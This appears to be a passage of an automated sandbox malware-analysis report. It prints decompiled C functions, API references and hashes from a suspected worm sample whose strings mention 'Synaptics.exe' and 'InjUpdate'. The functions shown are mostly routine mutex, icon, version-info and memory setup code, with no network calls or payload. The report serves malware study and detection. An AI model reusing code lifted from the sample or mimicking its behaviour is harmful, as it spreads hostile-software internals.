                                                                                                                                                                                                                            0x0049a3f8
                                                                                                                                                                                                                            0x0049a3fd
                                                                                                                                                                                                                            0x0049a5ba
                                                                                                                                                                                                                            0x0049a5cb
                                                                                                                                                                                                                            0x0049a5cf
                                                                                                                                                                                                                            0x0049a5d4
                                                                                                                                                                                                                            0x0049a5d6
                                                                                                                                                                                                                            0x0049a5d9
                                                                                                                                                                                                                            0x0049a5dc
                                                                                                                                                                                                                            0x0049a5ee
                                                                                                                                                                                                                            0x0049a5ee
                                                                                                                                                                                                                            0x0049a40a
                                                                                                                                                                                                                            0x0049a416
                                                                                                                                                                                                                            0x0049a426
                                                                                                                                                                                                                            0x0049a426
                                                                                                                                                                                                                            0x0049a42c
                                                                                                                                                                                                                            0x0049a432
                                                                                                                                                                                                                            0x0049a435
                                                                                                                                                                                                                            0x0049a43e
                                                                                                                                                                                                                            0x0049a446
                                                                                                                                                                                                                            0x0049a44d
                                                                                                                                                                                                                            0x0049a452
                                                                                                                                                                                                                            0x0049a453
                                                                                                                                                                                                                            0x0049a458
                                                                                                                                                                                                                            0x0049a465
                                                                                                                                                                                                                            0x0049a472
                                                                                                                                                                                                                            0x0049a477
                                                                                                                                                                                                                            0x0049a4fd
                                                                                                                                                                                                                            0x0049a4ff
                                                                                                                                                                                                                            0x0049a504
                                                                                                                                                                                                                            0x0049a50b
                                                                                                                                                                                                                            0x0049a5ac
                                                                                                                                                                                                                            0x0049a511
                                                                                                                                                                                                                            0x0049a513
                                                                                                                                                                                                                            0x0049a51a
                                                                                                                                                                                                                            0x0049a521
                                                                                                                                                                                                                            0x0049a528
                                                                                                                                                                                                                            0x0049a538
                                                                                                                                                                                                                            0x0049a542
                                                                                                                                                                                                                            0x0049a545
                                                                                                                                                                                                                            0x0049a54f
                                                                                                                                                                                                                            0x0049a552
                                                                                                                                                                                                                            0x0049a55c
                                                                                                                                                                                                                            0x0049a55f
                                                                                                                                                                                                                            0x0049a569
                                                                                                                                                                                                                            0x0049a56c
                                                                                                                                                                                                                            0x0049a576
                                                                                                                                                                                                                            0x0049a579
                                                                                                                                                                                                                            0x0049a583
                                                                                                                                                                                                                            0x0049a586
                                                                                                                                                                                                                            0x0049a58b
                                                                                                                                                                                                                            0x0049a594
                                                                                                                                                                                                                            0x0049a595
                                                                                                                                                                                                                            0x0049a59e
                                                                                                                                                                                                                            0x0049a52a
                                                                                                                                                                                                                            0x0049a52c
                                                                                                                                                                                                                            0x0049a52c
                                                                                                                                                                                                                            0x0049a528
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0049a50b
                                                                                                                                                                                                                            0x0049a47d
                                                                                                                                                                                                                            0x0049a494
                                                                                                                                                                                                                            0x0049a496
                                                                                                                                                                                                                            0x0049a498
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0049a49a
                                                                                                                                                                                                                            0x0049a49a
                                                                                                                                                                                                                            0x0049a49b
                                                                                                                                                                                                                            0x0049a4a0
                                                                                                                                                                                                                            0x0049a4b7
                                                                                                                                                                                                                            0x0049a4bc
                                                                                                                                                                                                                            0x0049a4c4
                                                                                                                                                                                                                            0x0049a4ca
                                                                                                                                                                                                                            0x0049a4d5
                                                                                                                                                                                                                            0x0049a4dd
                                                                                                                                                                                                                            0x0049a4de
                                                                                                                                                                                                                            0x0049a4e6
                                                                                                                                                                                                                            0x0049a4eb
                                                                                                                                                                                                                            0x0049a4ed
                                                                                                                                                                                                                            0x0049a4f4
                                                                                                                                                                                                                            0x0049a4f4
                                                                                                                                                                                                                            0x0049a4f9
                                                                                                                                                                                                                            0x0049a4f9
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • OpenMutexA.KERNEL32 ref: 0049A48F
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,001F0001,00000000,00000000), ref: 0049A49B
                                                                                                                                                                                                                            • OpenMutexA.KERNEL32 ref: 0049A4B2
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MutexOpen$CloseHandle
                                                                                                                                                                                                                            • String ID: ControlCenter -> Aktif$ControlCenter -> Pasif$InjUpdate$Synaptics.exe
                                                                                                                                                                                                                            • API String ID: 1942958553-1737343353
                                                                                                                                                                                                                            • Opcode ID: 698df5902b6dd65d62d8a088d3dc5d77190b0f7002f4ad2b0891d715899b60e5
                                                                                                                                                                                                                            • Instruction ID: 032596fc6928d1f920dd250c266260124ec275c25dbd90c6f41682d3cc039f83
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 698df5902b6dd65d62d8a088d3dc5d77190b0f7002f4ad2b0891d715899b60e5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B5149716002009FDB00EF6ADC82A9A37A9AB54308B11457FF804EB393DA7DED19879D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004590AC Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 125windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                            			E004590AC(void* __ecx, char __edx) {
				char _v5;
				char _v261;
				void* __ebx;
				void* __ebp;
				intOrPtr _t39;
				intOrPtr _t42;
				intOrPtr _t43;
				struct HINSTANCE__** _t53;
				struct HICON__* _t55;
				intOrPtr _t58;
				struct HINSTANCE__** _t60;
				void* _t67;
				char* _t69;
				char* _t75;
				intOrPtr _t81;
				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				char _t93;
				void* _t104;
				void* _t105;

				_t93 = __edx;
				_t91 = __ecx;
				if(__edx != 0) {
					_t105 = _t105 + 0xfffffff0;
					_t39 = E00403F10(_t39, _t104);
				}
				_v5 = _t93;
				_t90 = _t39;
				E00421B3C(_t91, 0);
				_t42 =  *0x49dabc; // 0x49b520
				if( *((short*)(_t42 + 2)) == 0) {
					_t89 =  *0x49dabc; // 0x49b520
					 *((intOrPtr*)(_t89 + 4)) = _t90;
					 *_t89 = 0x45a814;
				}
				_t43 =  *0x49dc10; // 0x49b528
				if( *((short*)(_t43 + 2)) == 0) {
					_t88 =  *0x49dc10; // 0x49b528
					 *((intOrPtr*)(_t88 + 4)) = _t90;
					 *_t88 = E0045AA0C;
				}
				 *((char*)(_t90 + 0x34)) = 0;
				 *((intOrPtr*)(_t90 + 0x90)) = E00403BBC(1);
				 *((intOrPtr*)(_t90 + 0xa8)) = E00403BBC(1);
				 *((intOrPtr*)(_t90 + 0x60)) = 0;
				 *((intOrPtr*)(_t90 + 0x84)) = 0;
				 *((intOrPtr*)(_t90 + 0x5c)) = 0xff000018;
				 *((intOrPtr*)(_t90 + 0x78)) = 0x1f4;
				 *((char*)(_t90 + 0x7c)) = 1;
				 *((intOrPtr*)(_t90 + 0x80)) = 0;
				 *((intOrPtr*)(_t90 + 0x74)) = 0x9c4;
				 *((char*)(_t90 + 0x88)) = 0;
				 *((char*)(_t90 + 0x9d)) = 1;
				 *((char*)(_t90 + 0xb4)) = 1;
				_t103 = E0042B3F8(1);
				 *((intOrPtr*)(_t90 + 0x98)) = _t52;
				_t53 =  *0x49d93c; // 0x49e030
				_t55 = LoadIconA( *_t53, "MAINICON"); // executed
				E0042B7C8(_t103, _t55);
				_t20 = _t90 + 0x98; // 0x736d
				_t58 =  *_t20;
				 *((intOrPtr*)(_t58 + 0x14)) = _t90;
				 *((intOrPtr*)(_t58 + 0x10)) = 0x45afac;
				_t60 =  *0x49d93c; // 0x49e030
				GetModuleFileNameA( *_t60,  &_v261, 0x100);
				OemToCharA( &_v261,  &_v261);
				_t67 = E0040E020(0x5c);
				if(_t67 != 0) {
					_t27 = _t67 + 1; // 0x1
					E00409FC4( &_v261, _t27);
				}
				_t69 = E0040E048( &_v261, 0x2e);
				if(_t69 != 0) {
					 *_t69 = 0;
				}
				CharLowerA( &(( &_v261)[1]));
				_t31 = _t90 + 0x8c; // 0x45150c
				E00404C30(_t31, 0x100,  &_v261);
				_t75 =  *0x49d6e4; // 0x49e038
				if( *_t75 == 0) {
					E004593B4(_t90, _t90, 0x100); // executed
				}
				 *((char*)(_t90 + 0x59)) = 1;
				 *((char*)(_t90 + 0x5a)) = 1;
				 *((char*)(_t90 + 0x5b)) = 1;
				 *((char*)(_t90 + 0x9e)) = 1;
				 *((intOrPtr*)(_t90 + 0xa0)) = 0;
				E0045B188(_t90, 0x100);
				E0045BB4C(_t90);
				_t81 = _t90;
				if(_v5 != 0) {
					E00403F68(_t81);
					_pop( *[fs:0x0]);
				}
				return _t90;
			}

























                                                                                                                                                                                                                            0x004590ac
                                                                                                                                                                                                                            0x004590ac
                                                                                                                                                                                                                            0x004590b9
                                                                                                                                                                                                                            0x004590bb
                                                                                                                                                                                                                            0x004590be
                                                                                                                                                                                                                            0x004590be
                                                                                                                                                                                                                            0x004590c3
                                                                                                                                                                                                                            0x004590c6
                                                                                                                                                                                                                            0x004590cc
                                                                                                                                                                                                                            0x004590d1
                                                                                                                                                                                                                            0x004590db
                                                                                                                                                                                                                            0x004590dd
                                                                                                                                                                                                                            0x004590e2
                                                                                                                                                                                                                            0x004590e5
                                                                                                                                                                                                                            0x004590e5
                                                                                                                                                                                                                            0x004590eb
                                                                                                                                                                                                                            0x004590f5
                                                                                                                                                                                                                            0x004590f7
                                                                                                                                                                                                                            0x004590fc
                                                                                                                                                                                                                            0x004590ff
                                                                                                                                                                                                                            0x004590ff
                                                                                                                                                                                                                            0x00459105
                                                                                                                                                                                                                            0x00459115
                                                                                                                                                                                                                            0x00459127
                                                                                                                                                                                                                            0x0045912f
                                                                                                                                                                                                                            0x00459134
                                                                                                                                                                                                                            0x0045913a
                                                                                                                                                                                                                            0x00459141
                                                                                                                                                                                                                            0x00459148
                                                                                                                                                                                                                            0x0045914e
                                                                                                                                                                                                                            0x00459154
                                                                                                                                                                                                                            0x0045915b
                                                                                                                                                                                                                            0x00459162
                                                                                                                                                                                                                            0x00459169
                                                                                                                                                                                                                            0x0045917c
                                                                                                                                                                                                                            0x0045917e
                                                                                                                                                                                                                            0x00459189
                                                                                                                                                                                                                            0x00459191
                                                                                                                                                                                                                            0x0045919a
                                                                                                                                                                                                                            0x0045919f
                                                                                                                                                                                                                            0x0045919f
                                                                                                                                                                                                                            0x004591a5
                                                                                                                                                                                                                            0x004591a8
                                                                                                                                                                                                                            0x004591bb
                                                                                                                                                                                                                            0x004591c3
                                                                                                                                                                                                                            0x004591d6
                                                                                                                                                                                                                            0x004591e3
                                                                                                                                                                                                                            0x004591ea
                                                                                                                                                                                                                            0x004591ec
                                                                                                                                                                                                                            0x004591f5
                                                                                                                                                                                                                            0x004591f5
                                                                                                                                                                                                                            0x00459202
                                                                                                                                                                                                                            0x00459209
                                                                                                                                                                                                                            0x0045920b
                                                                                                                                                                                                                            0x0045920b
                                                                                                                                                                                                                            0x00459216
                                                                                                                                                                                                                            0x0045921b
                                                                                                                                                                                                                            0x0045922c
                                                                                                                                                                                                                            0x00459231
                                                                                                                                                                                                                            0x00459239
                                                                                                                                                                                                                            0x0045923d
                                                                                                                                                                                                                            0x0045923d
                                                                                                                                                                                                                            0x00459242
                                                                                                                                                                                                                            0x00459246
                                                                                                                                                                                                                            0x0045924a
                                                                                                                                                                                                                            0x0045924e
                                                                                                                                                                                                                            0x00459257
                                                                                                                                                                                                                            0x0045925f
                                                                                                                                                                                                                            0x00459266
                                                                                                                                                                                                                            0x0045926b
                                                                                                                                                                                                                            0x00459271
                                                                                                                                                                                                                            0x00459273
                                                                                                                                                                                                                            0x00459278
                                                                                                                                                                                                                            0x0045927f
                                                                                                                                                                                                                            0x00459289

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadIconA.USER32(00400000,MAINICON), ref: 00459191
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00446440,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 004591C3
                                                                                                                                                                                                                            • OemToCharA.USER32(?,?), ref: 004591D6
                                                                                                                                                                                                                            • CharLowerA.USER32(?,00400000,?,00000100,?,?,?,00446440,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 00459216
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Char$FileIconLoadLowerModuleName
                                                                                                                                                                                                                            • String ID: 0I$8I$MAINICON
                                                                                                                                                                                                                            • API String ID: 3935243913-3756263232
                                                                                                                                                                                                                            • Opcode ID: 6d8b1a9b1b3b0c8ce7000258a2abcab798a72233c8836065be33f0d47b441d7d
                                                                                                                                                                                                                            • Instruction ID: 5a9b49fbd3013c0ee8ebc8f701b73d14000c1e337c5d680fa8568d3dadbd01b2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d8b1a9b1b3b0c8ce7000258a2abcab798a72233c8836065be33f0d47b441d7d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E516170A042449FD740EF29C885B857BE4AB15308F4484FAEC48DF397DBBD9988CB69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00401A9C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 571 401a9c-401abe RtlInitializeCriticalSection 572 401ac0-401ac5 RtlEnterCriticalSection 571->572 573 401aca-401b00 call 401460 * 3 LocalAlloc 571->573 572->573 580 401b31-401b45 573->580 581 401b02 573->581 585 401b51 580->585 586 401b47-401b4c RtlLeaveCriticalSection 580->586 583 401b07-401b19 581->583 583->583 584 401b1b-401b2a 583->584 584->580 586->585
                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E00401A9C() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push("\xef\xbf\xb				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x49e5cc);
				L004013F0();
				if( *0x49e04d != 0) {
					_push(0x49e5cc);
					L004013F8();
				}
				E00401460(0x49e5ec);
				E00401460(0x49e5fc);
				E00401460(0x49e628);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x49e624 = _t11;
				if( *0x49e624 != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x49e624; // 0x0
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x49e610)) = 0x49e60c;
					 *0x49e60c = 0x49e60c;
					 *0x49e618 = 0x49e60c;
					 *0x49e5c4 = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401B59);
				if( *0x49e04d != 0) {
					_push(0x49e5cc);
					L00401400();
					return 0;
				}
				return 0;
			}








                                                                                                                                                                                                                            0x00401aa1
                                                                                                                                                                                                                            0x00401aa2
                                                                                                                                                                                                                            0x00401aa7
                                                                                                                                                                                                                            0x00401aaa
                                                                                                                                                                                                                            0x00401aad
                                                                                                                                                                                                                            0x00401ab2
                                                                                                                                                                                                                            0x00401abe
                                                                                                                                                                                                                            0x00401ac0
                                                                                                                                                                                                                            0x00401ac5
                                                                                                                                                                                                                            0x00401ac5
                                                                                                                                                                                                                            0x00401acf
                                                                                                                                                                                                                            0x00401ad9
                                                                                                                                                                                                                            0x00401ae3
                                                                                                                                                                                                                            0x00401aef
                                                                                                                                                                                                                            0x00401af4
                                                                                                                                                                                                                            0x00401b00
                                                                                                                                                                                                                            0x00401b02
                                                                                                                                                                                                                            0x00401b07
                                                                                                                                                                                                                            0x00401b07
                                                                                                                                                                                                                            0x00401b0f
                                                                                                                                                                                                                            0x00401b13
                                                                                                                                                                                                                            0x00401b14
                                                                                                                                                                                                                            0x00401b20
                                                                                                                                                                                                                            0x00401b23
                                                                                                                                                                                                                            0x00401b25
                                                                                                                                                                                                                            0x00401b2a
                                                                                                                                                                                                                            0x00401b2a
                                                                                                                                                                                                                            0x00401b33
                                                                                                                                                                                                                            0x00401b36
                                                                                                                                                                                                                            0x00401b39
                                                                                                                                                                                                                            0x00401b45
                                                                                                                                                                                                                            0x00401b47
                                                                                                                                                                                                                            0x00401b4c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00401b4c
                                                                                                                                                                                                                            0x00401b51

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RtlInitializeCriticalSection.KERNEL32(0049E5CC,00000000,',?,?,00402336,02210000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AB2
                                                                                                                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049E5CC,0049E5CC,00000000,',?,?,00402336,02210000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AC5
                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0049E5CC,00000000,',?,?,00402336,02210000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AEF
                                                                                                                                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049E5CC,00401B59,00000000,',?,?,00402336,02210000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401B4C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                                                                                            • String ID: (I$'$I
                                                                                                                                                                                                                            • API String ID: 730355536-3463978989
                                                                                                                                                                                                                            • Opcode ID: 75eea6cd1ad15cfb1e46afda1a9ce73b7035c2e84f6dcfcc3888624585293549
                                                                                                                                                                                                                            • Instruction ID: dfc13510ffc652cdc4745fa131ecd9d2d70f716ade9f6bddb0b8d8da957d249b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75eea6cd1ad15cfb1e46afda1a9ce73b7035c2e84f6dcfcc3888624585293549
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E201AD70204240AEE716EB6B9816B153BD4D76970CF85807FF000A77F2E6BC6840CA1E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00474948 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                            			E00474948(char __eax, void* __ebx, void* __ecx, char __edx) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				signed short* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				intOrPtr _t52;
				void* _t65;
				intOrPtr _t71;
				intOrPtr _t76;
				void* _t93;
				intOrPtr _t101;
				intOrPtr _t103;
				void* _t109;
				void* _t110;
				intOrPtr _t111;

				_t109 = _t110;
				_t111 = _t110 + 0xffffffc4;
				_v40 = 0;
				_t93 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t109);
				_push(0x474ab3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t111;
				E004049C0(__ecx);
				_v32 = 0xff;
				_push( &_v28);
				_t52 = E00404ED8( &_v8);
				_push(_t52); // executed
				L004072A8(); // executed
				_v24 = _t52;
				if(_v24 == 0) {
					_pop(_t101);
					 *[fs:eax] = _t101;
					_push(0x474aba);
					E004049C0( &_v40);
					return E004049E4( &_v12, 2);
				} else {
					_v16 = E0040275C(_v24);
					_push(_t109);
					_push(0x474a89);
					_push( *[fs:eax]);
					 *[fs:eax] = _t111;
					_push(_v16);
					_push(_v24);
					_push(_v28);
					_t65 = E00404ED8( &_v8);
					_push(_t65); // executed
					L004072A0(); // executed
					if(_t65 != 0) {
						_push( &_v32);
						_push( &_v36);
						_push("\\VarFileInfo\\Translation");
						_t71 = _v16;
						_push(_t71);
						L004072B0();
						if(_t71 != 0) {
							_v64 =  *_v36 & 0x0000ffff;
							_v60 = 0;
							_v56 = E004079DC( *_v36) & 0x0000ffff;
							_v52 = 0;
							_v48 = _v12;
							_v44 = 0xb;
							E0040A664("\\StringFileInfo\\%0.4x%0.4x\\%s", 2,  &_v64,  &_v40);
							E00404A58( &_v12, _v40);
						}
						_push( &_v32);
						_push( &_v20);
						_push(E00404ED8( &_v12));
						_t76 = _v16;
						_push(_t76);
						L004072B0();
						if(_t76 != 0) {
							E0040A174(_v20, _t93);
						}
					}
					_pop(_t103);
					 *[fs:eax] = _t103;
					_push(0x474a90);
					return E0040277C(_v16);
				}
			}




























                                                                                                                                                                                                                            0x00474949
                                                                                                                                                                                                                            0x0047494b
                                                                                                                                                                                                                            0x00474951
                                                                                                                                                                                                                            0x00474954
                                                                                                                                                                                                                            0x00474956
                                                                                                                                                                                                                            0x00474959
                                                                                                                                                                                                                            0x0047495f
                                                                                                                                                                                                                            0x00474967
                                                                                                                                                                                                                            0x0047496e
                                                                                                                                                                                                                            0x0047496f
                                                                                                                                                                                                                            0x00474974
                                                                                                                                                                                                                            0x00474977
                                                                                                                                                                                                                            0x0047497c
                                                                                                                                                                                                                            0x00474981
                                                                                                                                                                                                                            0x0047498b
                                                                                                                                                                                                                            0x0047498f
                                                                                                                                                                                                                            0x00474994
                                                                                                                                                                                                                            0x00474995
                                                                                                                                                                                                                            0x0047499a
                                                                                                                                                                                                                            0x004749a1
                                                                                                                                                                                                                            0x00474a92
                                                                                                                                                                                                                            0x00474a95
                                                                                                                                                                                                                            0x00474a98
                                                                                                                                                                                                                            0x00474aa0
                                                                                                                                                                                                                            0x00474ab2
                                                                                                                                                                                                                            0x004749a7
                                                                                                                                                                                                                            0x004749af
                                                                                                                                                                                                                            0x004749b4
                                                                                                                                                                                                                            0x004749b5
                                                                                                                                                                                                                            0x004749ba
                                                                                                                                                                                                                            0x004749bd
                                                                                                                                                                                                                            0x004749c3
                                                                                                                                                                                                                            0x004749c7
                                                                                                                                                                                                                            0x004749cb
                                                                                                                                                                                                                            0x004749cf
                                                                                                                                                                                                                            0x004749d4
                                                                                                                                                                                                                            0x004749d5
                                                                                                                                                                                                                            0x004749dc
                                                                                                                                                                                                                            0x004749e5
                                                                                                                                                                                                                            0x004749e9
                                                                                                                                                                                                                            0x004749ea
                                                                                                                                                                                                                            0x004749ef
                                                                                                                                                                                                                            0x004749f2
                                                                                                                                                                                                                            0x004749f3
                                                                                                                                                                                                                            0x004749fa
                                                                                                                                                                                                                            0x00474a06
                                                                                                                                                                                                                            0x00474a09
                                                                                                                                                                                                                            0x00474a1a
                                                                                                                                                                                                                            0x00474a1d
                                                                                                                                                                                                                            0x00474a24
                                                                                                                                                                                                                            0x00474a27
                                                                                                                                                                                                                            0x00474a38
                                                                                                                                                                                                                            0x00474a43
                                                                                                                                                                                                                            0x00474a43
                                                                                                                                                                                                                            0x00474a4b
                                                                                                                                                                                                                            0x00474a4f
                                                                                                                                                                                                                            0x00474a58
                                                                                                                                                                                                                            0x00474a59
                                                                                                                                                                                                                            0x00474a5c
                                                                                                                                                                                                                            0x00474a5d
                                                                                                                                                                                                                            0x00474a64
                                                                                                                                                                                                                            0x00474a6b
                                                                                                                                                                                                                            0x00474a6b
                                                                                                                                                                                                                            0x00474a64
                                                                                                                                                                                                                            0x00474a72
                                                                                                                                                                                                                            0x00474a75
                                                                                                                                                                                                                            0x00474a78
                                                                                                                                                                                                                            0x00474a88
                                                                                                                                                                                                                            0x00474a88

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73AC14E0.VERSION(00000000,?,00000000,00474AB3), ref: 00474995
                                                                                                                                                                                                                            • 73AC14C0.VERSION(00000000,?,00000000,?,00000000,00474A89,?,00000000,?,00000000,00474AB3), ref: 004749D5
                                                                                                                                                                                                                            • 73AC1500.VERSION(?,\VarFileInfo\Translation,?,000000FF,00000000,?,00000000,?,00000000,00474A89,?,00000000,?,00000000,00474AB3), ref: 004749F3
                                                                                                                                                                                                                            • 73AC1500.VERSION(?,00000000,?,000000FF,?,\VarFileInfo\Translation,?,000000FF,00000000,?,00000000,?,00000000,00474A89,?,00000000), ref: 00474A5D
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • \VarFileInfo\Translation, xrefs: 004749EA
                                                                                                                                                                                                                            • \StringFileInfo\%0.4x%0.4x\%s, xrefs: 00474A33
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: C1500
                                                                                                                                                                                                                            • String ID: \StringFileInfo\%0.4x%0.4x\%s$\VarFileInfo\Translation
                                                                                                                                                                                                                            • API String ID: 1255762788-999260334
                                                                                                                                                                                                                            • Opcode ID: 428405fc8f6f2371291a775979248c6c5c1afe28fb968c4bd3e1fc8a87eda9b2
                                                                                                                                                                                                                            • Instruction ID: 32f586d465f208a33ace568febe6e2dc1f3a77b47997a46495fde34554132249
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 428405fc8f6f2371291a775979248c6c5c1afe28fb968c4bd3e1fc8a87eda9b2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7941ECB1D04209AFDB01EBE5D981AEFB7F8AB48304F50447AF514F3291D738AE048B69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004587A4 Relevance: 10.6, APIs: 7, Instructions: 89COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                                                                            			E004587A4(void* __eax, void* __ebx, void* __ecx, void* __edi) {
				char _v5;
				struct tagLOGFONTA _v65;
				struct tagLOGFONTA _v185;
				struct tagLOGFONTA _v245;
				void _v405;
				void* _t23;
				int _t27;
				void* _t30;
				intOrPtr _t38;
				struct HFONT__* _t41;
				struct HFONT__* _t45;
				struct HFONT__* _t49;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t57;
				void* _t72;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t72 = __edi;
				_t74 = _t75;
				_t76 = _t75 + 0xfffffe6c;
				_t57 = __eax;
				_v5 = 0;
